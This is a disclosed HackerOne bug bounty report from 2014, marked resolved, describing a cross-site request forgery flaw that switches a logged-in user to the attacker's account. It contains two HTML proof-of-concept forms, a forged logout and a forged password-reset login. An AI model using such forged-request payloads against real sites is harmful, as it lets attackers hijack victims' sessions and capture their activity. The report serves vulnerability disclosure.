Switching the user to the attacker's account

Disclosed: 2014-02-20 00:04:27 By dawidczagan To security
Unknown
Vulnerability Details
Two requests are needed to make it happen. Request1 (log out the user): <html> <body> <form action="https://hackerone.com/users/sign_out" method="POST"> <input type="hidden" name="&#95;method" value="delete" /> <input type="submit" value="Submit request" /> </form> </body> </html> Request2 (log in the user to the attacker's account): <html> <body> <form action="https://hackerone.com/users/password" method="POST"> <input type="hidden" name="utf8" value="â&#156;&#147;" /> <input type="hidden" name="&#95;method" value="put" /> <input type="hidden" name="user&#91;reset&#95;password&#95;token&#93;" value="ENTER_HERE_RESET_PASSWORD_TOKEN_FROM_MAIL" /> <input type="hidden" name="user&#91;password&#93;" value="ENTER_HERE_NEW_PASSWORD" /> <input type="hidden" name="user&#91;password&#95;confirmation&#93;" value="ENTER_HERE_NEW_PASSWORD" /> <input type="hidden" name="commit" value="Change&#32;password" /> <input type="submit" value="Submit request" /> </form> </body> </html> Please let me know if more detailed description is needed. Regards, Dawid Czagan
Actions
View on HackerOne
Report Stats
  • Report ID: 727
  • State: Closed
  • Substate: resolved
  • Upvotes: 25
Share this report